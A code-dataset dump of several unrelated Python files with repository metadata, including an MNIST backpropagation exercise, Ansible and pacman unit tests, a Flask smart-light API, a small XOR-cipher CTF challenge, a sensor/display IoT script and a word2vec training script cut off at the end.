|
week4/mnist_bp.py
|
anjiang2016/CVFundamentals
|
783c2efcaa2336d674661ae18cdec744b91223c3
|
[
"MIT"
] | 12 |
2020-05-25T08:21:25.000Z
|
2022-02-22T09:02:00.000Z
|
week4/mnist_bp.py
|
anjiang2016/CVFundamentals
|
783c2efcaa2336d674661ae18cdec744b91223c3
|
[
"MIT"
] | null | null | null |
week4/mnist_bp.py
|
anjiang2016/CVFundamentals
|
783c2efcaa2336d674661ae18cdec744b91223c3
|
[
"MIT"
] | 6 |
2020-06-02T11:54:03.000Z
|
2022-02-22T09:03:05.000Z
|
#coding:utf-8
# code for week2,recognize_computer_vision.py
# houchangligong,zhaomingming,20200602,
import torch
from itertools import product
import pdb
import sys
from mnist import MNIST
import cv2
import numpy as np
#mndata = MNIST('python-mnist/data/')
#images, labels = mndata.load_training()
def generate_data():
# 本函数生成0-9,10个数字的图片矩阵
image_data=[]
num_0 = torch.tensor(
[[0,0,1,1,0,0],
[0,1,0,0,1,0],
[0,1,0,0,1,0],
[0,1,0,0,1,0],
[0,0,1,1,0,0],
[0,0,0,0,0,0]])
image_data.append(num_0)
num_1 = torch.tensor(
[[0,0,0,1,0,0],
[0,0,1,1,0,0],
[0,0,0,1,0,0],
[0,0,0,1,0,0],
[0,0,1,1,1,0],
[0,0,0,0,0,0]])
image_data.append(num_1)
num_2 = torch.tensor(
[[0,0,1,1,0,0],
[0,1,0,0,1,0],
[0,0,0,1,0,0],
[0,0,1,0,0,0],
[0,1,1,1,1,0],
[0,0,0,0,0,0]])
image_data.append(num_2)
num_3 = torch.tensor(
[[0,0,1,1,0,0],
[0,0,0,0,1,0],
[0,0,1,1,0,0],
[0,0,0,0,1,0],
[0,0,1,1,0,0],
[0,0,0,0,0,0]])
image_data.append(num_3)
num_4 = torch.tensor(
[
[0,0,0,0,1,0],
[0,0,0,1,1,0],
[0,0,1,0,1,0],
[0,1,1,1,1,1],
[0,0,0,0,1,0],
[0,0,0,0,0,0]])
image_data.append(num_4)
num_5 = torch.tensor(
[
[0,1,1,1,0,0],
[0,1,0,0,0,0],
[0,1,1,1,0,0],
[0,0,0,0,1,0],
[0,1,1,1,0,0],
[0,0,0,0,0,0]])
image_data.append(num_5)
num_6 = torch.tensor(
[[0,0,1,1,0,0],
[0,1,0,0,0,0],
[0,1,1,1,0,0],
[0,1,0,0,1,0],
[0,0,1,1,0,0],
[0,0,0,0,0,0]])
image_data.append(num_6)
num_7 = torch.tensor(
[
[0,1,1,1,1,0],
[0,0,0,0,1,0],
[0,0,0,1,0,0],
[0,0,0,1,0,0],
[0,0,0,1,0,0],
[0,0,0,0,0,0]])
image_data.append(num_7)
num_8 = torch.tensor(
[[0,0,1,1,0,0],
[0,1,0,0,1,0],
[0,0,1,1,0,0],
[0,1,0,0,1,0],
[0,0,1,1,0,0],
[0,0,0,0,0,0]])
image_data.append(num_8)
num_9 = torch.tensor(
[[0,0,1,1,1,0],
[0,1,0,0,1,0],
[0,1,1,1,1,0],
[0,0,0,0,1,0],
[0,0,0,0,1,0],
[0,0,0,0,0,0]])
image_data.append(num_9)
image_label=[0,1,2,3,4,5,6,7,8,9]
return image_data,image_label
def get_feature(x):
feature=[0,0,0,0]
xa = np.array(x)
xt = torch.from_numpy(xa.reshape(28,28))
# 下面添加提取图像x的特征feature的代码
def get_shadow(x,dim):
feature =torch.sum(x,dim)
feature = feature.float()
## 归一化
for i in range(0,feature.shape[0]):
feature[i]=feature[i]/sum(feature)
feature = feature.view(1,28)
return feature
#pdb.set_trace()
feature = get_shadow(xt,0)
#import pdb
#pdb.set_trace()
#print(feature)
return feature
def model(feature,weights0,weights1):
y=-1
# 下面添加对feature进行决策的代码,判定出feature 属于[0,1,2,3,...9]哪个类别
#import pdb
#pdb.set_trace()
feature = torch.cat((feature,torch.tensor(1.0).view(1,1)),1)
feature2=feature.mul(feature)
#feature3=feature2.mul(feature)
#feature4=feature3.mul(feature)
#pdb.set_trace()
#y = feature.mm(weights[:,0:1])+feature2.mm(weights[:,1:2])+feature3.mm(weights[:,2:3])+feature4.mm(weights[:,3:4])
h = feature.mm(weights0)
h1 = torch.tan(h).mm(weights1)
y =torch.sigmoid(h1)
#y = 1.0/(1.0+torch.exp(-1.*h))
return y
def get_acc(image_data,image_label,weights0,weights1,start_i,end_i):
correct=0
for i in range(start_i,end_i):
#print(image_label[i])
#y = model(get_feature(image_data[i]),weights)
feature = get_feature(image_data[i])
y = model(feature,weights0,weights1)
#pdb.set_trace()
gt = image_label[i]
#pred=torch.argmin(torch.abs(y-gt)).item()
#pred = torch.argmin(torch.from_numpy(np.array([torch.min((torch.abs(y-j))).item() for j in range(0,10)]))).item()
pred = torch.argmin(torch.min(torch.abs(y-1))).item()
#print("图像[%s]得分类结果是:[%s]"%(gt,pred))
if gt==pred:
correct+=1
#print("acc=%s"%(float(correct/20.0)))
return float(correct/float(end_i-start_i))
def one_hot(gt):
gt_vector = torch.ones(1,10)
gt_vector *= 0.0
gt_vector[0,gt] = 1.0
return gt_vector
def train_model(image_data,image_label,weights0,weights1,lr):
loss_value_before=1000000000000000.
loss_value=10000000000000.
for epoch in range(0,300):
#epoch=0
#while (loss_value_before-loss_value)>-1:
#loss = 0
#for i in range(0,len(image_data)):
loss_value_before=loss_value
loss_value=0
for i in range(0,80):
#print(image_label[i])
#y = model(get_feature(image_data[i]),weights)
feature = get_feature(image_data[i])
y = model(feature,weights0,weights1)
#import pdb
#pdb.set_trace()
#gt=label2ground_truth(image_label)
#loss = 0.5*(y-image_label[i])*(y-image_label[i])
#loss = torch.sum((y-gt[i:i+1,:]).mul(y-gt[i:i+1,:]))
#pdb.set_trace()
gt = image_label[i]
# 只关心一个值
loss = torch.sum((y[0,gt:gt+1]-gt).mul(y[0,gt:gt+1]-gt))
gt_vector = one_hot(gt)
#pdb.set_trace()
# 关心所有值
#loss = torch.sum((y-gt_vector).mul(y-gt_vector))
# 用log的方式
#pdb.set_trace()
#loss = -torch.log(y[0,gt])-torch.sum(torch.log(1.0-y[0,0:gt]))-torch.sum(torch.log(1-y[0,gt:-1]))
# 优化loss,正样本接近1,负样本远离1
#loss1 = (y-1.0).mul(y-1.0)
#loss = loss1[0,gt]+torch.sum(1.0/(loss1[0,0:gt]))+torch.sum(1.0/(loss1[0,gt:-1]))
#print("%s,%s"%(y[0,gt:gt+1],gt))
#loss.data.add_(loss.data)
loss_value += loss.data.item()
#print("loss=%s"%(loss))
#weights =
# 更新公式
# w = w - (y-y1)*x*lr
#feature=feature.view(6)
#lr=-lr
#weights[0,0] = weights[0,0]+ (y.item()-image_label[i])*feature[0]*lr
#weights[1,0] = weights[1,0]+ (y.item()-image_label[i])*feature[1]*lr
#weights[2,0] = weights[2,0]+ (y.item()-image_label[i])*feature[2]*lr
#weights[3,0] = weights[3,0]+ (y.item()-image_label[i])*feature[3]*lr
#weights[4,0] = weights[4,0]+ (y.item()-image_label[i])*feature[4]*lr
#weights[5,0] = weights[5,0]+ (y.item()-image_label[i])*feature[5]*lr
#weights[6,0] = weights[6,0]+ (y.item()-image_label[i])*lr
loss.backward()
weights0.data.sub_(weights0.grad.data*lr)
weights0.grad.data.zero_()
weights1.data.sub_(weights1.grad.data*lr)
weights1.grad.data.zero_()
#loss.data=
#import pdb
#print("epoch=%s,loss=%s/%s,weights=%s"%(epoch,loss_value,loss_value_before,(weights[:,0:2]).view(14)))
train_acc=get_acc(image_data,image_label,weights0,weights1,0,80)
test_acc =get_acc(image_data,image_label,weights0,weights1,80,100)
print("epoch=%s,loss=%s/%s,train/test_acc:%s/%s"%(epoch,loss_value,loss_value_before,train_acc,test_acc))
#epoch+=1
#loss_value=0
#:loss=0
#import pdb
#pdb.set_trace()
return weights0,weights1
if __name__=="__main__":
weights0 = torch.randn(29,35,requires_grad = True)
weights1 = torch.randn(35,10,requires_grad = True)
# hct66 dataset , 10 samples
image_data,image_label = generate_data()
# minst 2828 dataset 60000 samples
mndata = MNIST('./mnist/python-mnist/data/')
image_data_all, image_label_all = mndata.load_training()
image_data=image_data_all[0:100]
image_label=image_label_all[0:100]
'''
pdb.set_trace()
# 打印第1张图像
print("数字%s对应的图片是:"%(image_label[0]))
#print(image_data[3])
cv2.imshow(str(image_label[3]),np.array(image_data[3]).reshape((28,28)).astype('uint8'))
cv2.waitKey(2000)
print("-"*20)
# 打印出第2张图像
print("数字%s对应的图片是:"%(image_label[1]))
cv2.imshow(str(image_label[1]),np.array(image_data[1]).reshape((28,28)).astype('uint8'))
cv2.waitKey(2000)
print("-"*20)
'''
lr = float(sys.argv[1])
# 对模型进行训练:
weights0,weight1=train_model(image_data,image_label,weights0,weights1,lr)
#测试:
correct=0
for i in range(80,100):
#print(image_label[i])
#y = model(get_feature(image_data[i]),weights)
feature = get_feature(image_data[i])
y = model(feature,weights0,weights1)
#pdb.set_trace()
gt = image_label[i]
#pred=torch.argmin(torch.abs(y-gt)).item()
#pred = torch.argmin(torch.from_numpy(np.array([torch.min((torch.abs(y-j))).item() for j in range(0,10)]))).item()
pred = torch.argmin(torch.min(torch.abs(y-1))).item()
print("图像[%s]得分类结果是:[%s]"%(gt,pred))
if gt==pred:
correct+=1
print("acc=%s"%(float(correct/20.0)))
| 31.806338 | 127 | 0.551201 |
4d7e6cc69f6fe6e7f2327b4c086190c9a1eea61e
| 7,567 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cnos/test_cnos_vlan.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cnos/test_cnos_vlan.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/cnos/test_cnos_vlan.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
# (c) 2018 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.plugins.modules.network.cnos import cnos_vlan
from ansible_collections.community.general.plugins.modules.network.cnos.cnos_vlan import parse_vlan_brief
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
from ..cnos_module import TestCnosModule, load_fixture
class TestCnosVlanModule(TestCnosModule):
module = cnos_vlan
def setUp(self):
super(TestCnosVlanModule, self).setUp()
self.mock_run_commands = patch('ansible_collections.community.general.plugins.modules.network.cnos.cnos_vlan.run_commands')
self.run_commands = self.mock_run_commands.start()
self.mock_load_config = patch('ansible_collections.community.general.plugins.modules.network.cnos.cnos_vlan.load_config')
self.load_config = self.mock_load_config.start()
def tearDown(self):
super(TestCnosVlanModule, self).tearDown()
self.mock_run_commands.stop()
self.mock_load_config.stop()
def load_fixtures(self, commands=None, transport='cli'):
self.run_commands.return_value = [load_fixture('cnos_vlan_config.cfg')]
self.load_config.return_value = {'diff': None, 'session': 'session'}
def test_cnos_vlan_create(self):
set_module_args({'vlan_id': '3', 'name': 'test', 'state': 'present'})
result = self.execute_module(changed=True)
expected_commands = [
'vlan 3',
'name test',
]
self.assertEqual(result['commands'], expected_commands)
def test_cnos_vlan_id_startwith_9(self):
set_module_args({'vlan_id': '13', 'name': 'anil', 'state': 'present'})
result = self.execute_module(changed=False)
expected_commands = []
self.assertEqual(result['commands'], expected_commands)
def test_cnos_vlan_rename(self):
set_module_args({'vlan_id': '2', 'name': 'test', 'state': 'present'})
result = self.execute_module(changed=True)
expected_commands = [
'vlan 2',
'name test',
]
self.assertEqual(result['commands'], expected_commands)
def test_cnos_vlan_with_interfaces(self):
set_module_args({'vlan_id': '2', 'name': 'vlan2', 'state': 'present',
'interfaces': ['Ethernet1/33', 'Ethernet1/44']})
result = self.execute_module(changed=True)
expected_commands = [
'vlan 2',
'name vlan2',
'vlan 2',
'interface Ethernet1/33',
'switchport mode access',
'switchport access vlan 2',
'vlan 2',
'interface Ethernet1/44',
'switchport mode access',
'switchport access vlan 2',
]
self.assertEqual(result['commands'], expected_commands)
def test_cnos_vlan_with_interfaces_and_newvlan(self):
set_module_args({'vlan_id': '3',
'name': 'vlan3', 'state': 'present',
'interfaces': ['Ethernet1/33', 'Ethernet1/44']})
result = self.execute_module(changed=True)
expected_commands = [
'vlan 3',
'name vlan3',
'vlan 3',
'interface Ethernet1/33',
'switchport mode access',
'switchport access vlan 3',
'vlan 3',
'interface Ethernet1/44',
'switchport mode access',
'switchport access vlan 3',
]
self.assertEqual(result['commands'], expected_commands)
def test_parse_vlan_brief(self):
result = parse_vlan_brief(load_fixture('cnos_vlan_config.cfg'))
obj = [
{
'interfaces': [
'po1',
'po2',
'po11',
'po12',
'po13',
'po14',
'po15',
'po17',
'po20',
'po100',
'po1001',
'po1002',
'po1003',
'po1004',
'Ethernet1/2',
'Ethernet1/3',
'Ethernet1/4',
'Ethernet1/9',
'Ethernet1/10',
'Ethernet1/11',
'Ethernet1/14',
'Ethernet1/15',
'Ethernet1/16',
'Ethernet1/17',
'Ethernet1/18',
'Ethernet1/19',
'Ethernet1/20',
'Ethernet1/21',
'Ethernet1/22',
'Ethernet1/23',
'Ethernet1/24',
'Ethernet1/25',
'Ethernet1/26',
'Ethernet1/27',
'Ethernet1/28',
'Ethernet1/29',
'Ethernet1/30',
'Ethernet1/31',
'Ethernet1/32',
'Ethernet1/33',
'Ethernet1/34',
'Ethernet1/35',
'Ethernet1/36',
'Ethernet1/37',
'Ethernet1/38',
'Ethernet1/39',
'Ethernet1/40',
'Ethernet1/41',
'Ethernet1/42',
'Ethernet1/43',
'Ethernet1/44',
'Ethernet1/45',
'Ethernet1/46',
'Ethernet1/47',
'Ethernet1/48',
'Ethernet1/49',
'Ethernet1/50',
'Ethernet1/51',
'Ethernet1/52',
'Ethernet1/53',
'Ethernet1/54'],
'state': 'ACTIVE',
'name': 'default',
'vlan_id': '1'},
{
'interfaces': [],
'state': 'ACTIVE',
'name': 'VLAN0002',
'vlan_id': '2'},
{
'interfaces': [],
'state': 'ACTIVE',
'name': 'VLAN0003',
'vlan_id': '3'},
{
'interfaces': [],
'state': 'ACTIVE',
'name': 'VLAN0005',
'vlan_id': '5'},
{
'interfaces': [],
'state': 'ACTIVE',
'name': 'VLAN0012',
'vlan_id': '12'},
{
'interfaces': [],
'state': 'ACTIVE',
'name': 'anil',
'vlan_id': '13'}]
self.assertEqual(result, obj)
| 36.555556 | 131 | 0.504427 |
4274487d0116c231118e01a5ed198982161606d4
| 695 |
py
|
Python
|
pacman-termux/test/pacman/tests/remove012.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/remove012.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/remove012.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Remove a package with a modified file marked for backup and has existing pacsaves"
self.filesystem = ["etc/dummy.conf.pacsave",
"etc/dummy.conf.pacsave.1",
"etc/dummy.conf.pacsave.2"]
p1 = pmpkg("dummy")
p1.files = ["etc/dummy.conf*"]
p1.backup = ["etc/dummy.conf"]
self.addpkg2db("local", p1)
self.args = "-R %s" % p1.name
self.addrule("PACMAN_RETCODE=0")
self.addrule("!PKG_EXIST=dummy")
self.addrule("!FILE_EXIST=etc/dummy.conf")
self.addrule("FILE_PACSAVE=etc/dummy.conf")
self.addrule("FILE_EXIST=etc/dummy.conf.pacsave.1")
self.addrule("FILE_EXIST=etc/dummy.conf.pacsave.2")
self.addrule("FILE_EXIST=etc/dummy.conf.pacsave.3")
| 33.095238 | 102 | 0.697842 |
67af2fbcfa84ac1c79402effba64313a1a2a2022
| 577 |
py
|
Python
|
vorl5-ueb4-gui.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
vorl5-ueb4-gui.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
vorl5-ueb4-gui.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
# 5. Vorlesung 17.10.2020, Skript Python 4 (07_Python_04.pdf)
# Übung 4: GUI
from tkinter import *
def text_out(event):
label.configure(text=entry.get())
main = Tk()
main.title("MeineApp")
label = Label(main, text="Howdy TKinter!", fg="red")
entry = Entry(main)
entry.bind("<Return>",text_out)
button = Button(main, text="Drück mich", width=25, command=text_out)
label.pack()
entry.pack()
button.pack()
cnv = Canvas (main, width=200, height=200)
cnv.pack()
points = [100,60,120,100,80,100]
cnv.create_polygon(points,outline="black",fill="white",width=3)
mainloop()
| 20.607143 | 68 | 0.701906 |
db25f58714cfb3e2ef1586b19ae57b4aaf852700
| 2,706 |
py
|
Python
|
gateway/desktop/python/server.py
|
mikebarkmin/smartlights
|
8551f8ec06391f65ec075d2fcd2f0dd958c51a90
|
[
"Unlicense"
] | null | null | null |
gateway/desktop/python/server.py
|
mikebarkmin/smartlights
|
8551f8ec06391f65ec075d2fcd2f0dd958c51a90
|
[
"Unlicense"
] | 2 |
2021-05-10T14:10:34.000Z
|
2021-09-01T22:32:45.000Z
|
gateway/desktop/python/server.py
|
mikebarkmin/smartlights
|
8551f8ec06391f65ec075d2fcd2f0dd958c51a90
|
[
"Unlicense"
] | null | null | null |
from flask import Flask, request, jsonify
from light import Light
from device import NetworkDevice
app = Flask(__name__)
@app.route("/devices", methods=["GET"])
def get_devices():
"""
Gib alle IP Adressen der Netwerkgeräte
"""
return jsonify([d.ip_address for d in NetworkDevice.all()])
@app.route("/lights", methods=["POST", "GET"])
def lights():
if request.method == "GET":
return get_lights()
elif request.method == "POST":
return post_lights()
def get_lights():
"""
Gib alle Lampe
"""
return jsonify([l.to_dict() for l in Light.all()])
def post_lights():
"""
Füge eine neue Lampe hinzu
:body name: Name der Lampe
:body ip_address: IP Adresse der Lampe
:body port: Port des HTTP-Servers der Lampe
"""
json = request.get_json()
if not json:
return jsonify({'message': 'no data received'}), 400
name = json.get('name')
ip_address = json.get('ip_address')
port = json.get('port')
if not name or not ip_address or not port:
return jsonify({'message': 'information is missing'}), 400
light = Light(
None,
name,
ip_address,
port,
r=json.get('r', 0),
g=json.get('g', 0),
b=json.get('b', 0)
)
light.save()
return jsonify({'message': 'Light saved'}), 200
@app.route("/lights/<id>", methods=["DELETE", "PUT"])
def light(id):
if request.method == "DELETE":
return delete_light(id)
elif request.method == "PUT":
return put_light(id)
def delete_light(id):
"""
Lösche eine Lampe
"""
light = Light.get(id)
if not light:
return jsonify({'message': 'Light not found'}), 404
light.delete()
return jsonify({'message': 'Light deleted'}), 200
def put_light(id):
"""
Setze den Status einer Lampe
:body name (optional): Name der Lampe
:body r (optional): Rotwert [0...255]
:body g (optional): Grünwert [0...255]
:body b (optional): Blauwert [0...255]
"""
json = request.get_json()
if not json:
return jsonify({'message': 'no data received'}), 200
light = Light.get(id)
if not light:
return jsonify({'message': 'Light not found'}), 404
if json.get('name') is not None:
light.name = json.get('name')
if json.get('r') is not None:
light.r = json.get('r')
if json.get('g') is not None:
light.g = json.get('g')
if json.get('b') is not None:
light.b = json.get('b')
light.save()
return jsonify({'message': 'Light saved'}), 200
if __name__ == '__main__':
Light.create_table()
app.run(host='0.0.0.0', port=8000, debug=True)
| 21.822581 | 66 | 0.584996 |
2202ca6baaf6fdfc63469eab53474fbef3d4be35
| 342 |
py
|
Python
|
crypto/Mxor/chall.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | 6 |
2021-02-18T15:07:55.000Z
|
2022-02-04T01:38:10.000Z
|
crypto/Mxor/release/chall.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | null | null | null |
crypto/Mxor/release/chall.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | null | null | null |
import base64, string
def xors(msg, key):
res = ''
for i in range(len(msg)):
res += chr(ord(msg[i]) ^ ord(key[i % len(key)]))
return res
flag = open('flag').read()
key = open('key').read()
assert len(key) == 5 and all(x in string.lowercase for x in key)
m = str(int(flag.encode('hex'), 16))
c = xors(m, key)
print base64.b64encode(c)
| 21.375 | 64 | 0.625731 |
2276649e30a49ae00ef1fdcdaee6ba13cd32a03a
| 4,209 |
py
|
Python
|
run.py
|
friskit-china/IoH
|
2728e9cfcc5316948b5dacbceb132c1dfcf285b6
|
[
"MIT"
] | null | null | null |
run.py
|
friskit-china/IoH
|
2728e9cfcc5316948b5dacbceb132c1dfcf285b6
|
[
"MIT"
] | null | null | null |
run.py
|
friskit-china/IoH
|
2728e9cfcc5316948b5dacbceb132c1dfcf285b6
|
[
"MIT"
] | null | null | null |
from easydict import EasyDict as edict
import argparse
from modules import BME280, SSD1306, Metering
import threading
import signal
import board
import busio
import logging
import time
import os
def metering_publish_worker(_g):
loop_sleep_time = _g.opt.iot_metering_publish_interval_sec
metering_module = _g.modules.metering_module
while metering_module.is_stop is not True:
start_time = time.time()
metering_module.update()
end_time = time.time()
time.sleep(loop_sleep_time - (end_time - start_time))
pass
def bme280_update_worker(_g):
loop_sleep_time = _g.opt.bme280_interval_sec
bme280_module = _g.modules.bme280_module
while bme280_module.is_stop is not True:
start_time = time.time()
bme280_module.update()
end_time = time.time()
time.sleep(loop_sleep_time - (end_time - start_time))
def ssd1306_update_worker(_g):
loop_sleep_time = _g.opt.ssd1306_interval_sec
ssd1306_module = _g.modules.ssd1306_module
while _g.modules.ssd1306_module.is_stop is not True:
start_time = time.time()
ssd1306_module.update()
end_time = time.time()
time.sleep(loop_sleep_time - (end_time - start_time))
def init_logger(_g):
logger = logging.getLogger(__name__)
logger.setLevel(level=logging.INFO)
handler = logging.FileHandler(_g.opt.logger_filename)
handler.setLevel(logging.WARNING)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
logger.addHandler(handler)
logger.addHandler(console)
logger.warning('[Main] Logger ready')
return logger
def main():
_g = edict()
parser = argparse.ArgumentParser()
parser.add_argument('--smbus_port', type=int, default=1)
parser.add_argument('--bme280_address', type=int, default=0x76)
parser.add_argument('--bme280_interval_sec', type=int, default=1)
parser.add_argument('--pwm_address', type=int, default=0x40)
parser.add_argument('--ssd1306_address', type=int, default=0x3c)
parser.add_argument('--ssd1306_width', type=int, default=128)
parser.add_argument('--ssd1306_height', type=int, default=64)
parser.add_argument('--ssd1306_interval_sec', type=int, default=1)
parser.add_argument('--logger_filename', type=str, default='log.txt')
parser.add_argument('--iot_host', type=str, default='cloud.thingsboard.io')
parser.add_argument('--iot_metering_publish_interval_sec', type=int, default=2)
_g.opt = parser.parse_args()
_g.is_stop = False
_g.logger = init_logger(_g)
def exit_signal(signum, frame):
_g.logger.warning('[Main] Finalizing')
for module in _g.modules.values():
module.is_stop = True
_g.is_stop=True
signal.signal(signal.SIGINT, exit_signal)
signal.signal(signal.SIGTERM, exit_signal)
_g.i2c_bus = busio.I2C(board.SCL, board.SDA)
# init each modules
_g.modules = dict()
_g.modules.bme280_module = BME280(_g, _g.i2c_bus, _g.opt.bme280_address)
_g.modules.ssd1306_module = SSD1306(_g, _g.i2c_bus, _g.opt.ssd1306_address, width=_g.opt.ssd1306_width, height=_g.opt.ssd1306_height)
# _g.modules.metering_module = Metering(_g, _g.opt.iot_host)
_g.modules.metering_module = Metering(_g, ioh_host=None) # use environment variable
# multiple threading for each module
_g.threads = dict()
_g.threads.bme280_module_thread = threading.Thread(target=bme280_update_worker, args=(_g,))
_g.threads.ssd1306_module_thread = threading.Thread(target=ssd1306_update_worker, args=(_g,))
_g.threads.metering_module_thread = threading.Thread(target=metering_publish_worker, args=(_g,))
for thread_handle in _g.threads.values():
thread_handle.start()
# the main loop
while _g.is_stop is not True:
# nothing to do now.
time.sleep(0.1)
pass
if __name__ == '__main__':
print('program start')
main()
print('program finish')
| 34.785124 | 138 | 0.690425 |
361ae394d7e1bfe400d29c39550fec271b2ff0b0
| 7,811 |
py
|
Python
|
scripts/train_word2vec.py
|
PyGeoL/GeoL
|
67a5bd2f63091e19041094c14d419055fa5ce6f0
|
[
"MIT"
] | 8 |
2018-03-09T16:44:38.000Z
|
2021-04-07T11:33:30.000Z
|
scripts/train_word2vec.py
|
PyGeoL/GeoL
|
67a5bd2f63091e19041094c14d419055fa5ce6f0
|
[
"MIT"
] | 4 |
2020-03-24T15:34:54.000Z
|
2021-06-01T21:54:33.000Z
|
scripts/train_word2vec.py
|
PyGeoL/GeoL
|
67a5bd2f63091e19041094c14d419055fa5ce6f0
|
[
"MIT"
] | 1 |
2020-05-13T14:30:55.000Z
|
2020-05-13T14:30:55.000Z
|
"""
Simple script to train word2vec model. It gets in input a list of POIs categories chains (e.g. Shops & Services:Gas Stations).
It preprocess the text and train the word2vec model with the words at the requested level (e.g. level=2 Gas Stations).
"""
# Authors: Gianni Barlacchi <[email protected]>
# Michele Ferretti <[email protected]>
import argparse
import gensim
import logging
import os
import sys
from sklearn.manifold import TSNE
import matplotlib
matplotlib.use('Agg') # don't use Windows by default
import matplotlib.pyplot as plt
import multiprocessing
from geol.geol_logger.geol_logger import logger
from geol.utils.utils import pre_processing
def run_w2v_model(outputfolder, word_list, cbow, prefix, size, count, window, plot):
"""
Run Word2Vec model
"""
output = os.path.abspath(os.path.join(outputfolder, prefix + '_s'+str(size) +
'_ws' + str(window) + '_c' + str(count) + '.model'))
skip_gram = 1
if cbow:
skip_gram = 0
logger.info("Train w2v model - size: %s, min count: %s, window size: %s" %
(size, count, window))
model = gensim.models.Word2Vec(
word_list, sg=skip_gram, size=size, min_count=count, window=window, workers=4)
model.wv.save_word2vec_format(output, binary=False)
if plot:
tsne_plot(model, size, window, count, outputfolder, prefix)
def tsne_plot(model, size, window, count, outputfolder, prefix):
"""
Creates and TSNE model and plots it
"""
labels = []
tokens = []
for word in model.wv.vocab:
tokens.append(model[word])
labels.append(word)
tsne_model = TSNE(perplexity=40, n_components=2,
init='pca', n_iter=2500, random_state=23)
new_values = tsne_model.fit_transform(tokens)
x = []
y = []
for value in new_values:
x.append(value[0])
y.append(value[1])
plt.figure(figsize=(16, 16))
for i in range(len(x)):
plt.scatter(x[i], y[i])
plt.annotate(labels[i],
xy=(x[i], y[i]),
xytext=(5, 2),
textcoords='offset points',
ha='right',
va='bottom')
plt.title('Size:'+str(size)+' Window:'+str(window)+' Count:'+str(count))
plt.savefig(os.path.abspath(os.path.join(outputfolder, 'imgs', prefix + '_s' + str(size)+'_ws' + str(window) +
'_c'+str(count)+'.png')), bbox_inches='tight')
plt.show()
def main(argv):
parser = argparse.ArgumentParser('Build your own Word2Vec embeddings.')
parser.add_argument('-i', '--inputfile',
help='Input file.',
action='store',
dest='input',
required=True,
type=str)
parser.add_argument('-o', '--outputfolder',
help='Output folder where to save the grids.',
action='store',
dest='outputfolder',
required=True,
type=str)
parser.add_argument('-p', '--prefix',
action='store',
dest='prefix',
help='Prefix for the filename in the form <prefix>_<grid_type>_<cell_size>. By default is w2v',
default='w2v',
type=str)
parser.add_argument('-plt', '--plot',
action='store_true',
dest='plot',
help='t-SNE plot',
default=False
)
parser.add_argument('-l', '--level',
help='Level of depth in the categories chain (default=5).',
dest='level',
default=5,
type=int)
# ----- W2V params -----
parser.add_argument('-cb', '--cbow',
action='store_true',
dest='cbow',
help='Use it to train the model with CBOW. By default is Skip-Gram.',
default=False)
parser.add_argument('-s', '--size',
help='List of vector sizes (s1, s2, ..), default = 50.',
dest='sizes',
nargs="+",
default=[50],
type=int)
parser.add_argument('-ws', '--window_size)',
help='List of window sizes (s1, s2, ..), default = 5.',
dest='windows',
nargs="+",
default=[5],
type=int)
parser.add_argument('-c', '--min_count',
help='List of minimum count sizes (s1, s2, ..), default = 5.',
dest='counts',
nargs="+",
default=[5],
type=int)
# ----- end W2V params -----
parser.add_argument('-m', '--multiprocessing',
help='Abilitate multiprocessing (strongly suggested when more CPUs are available)',
dest='mp',
action='store_true',
default=False)
parser.add_argument('-v', '--verbose',
help='Level of output verbosity.',
action='store',
dest='verbosity',
default=0,
type=int,
nargs="?")
args = parser.parse_args()
if(args.verbosity == 1):
logger.setLevel(logging.INFO)
elif(args.verbosity == 2):
logger.setLevel(logging.INFO)
if args.mp == True:
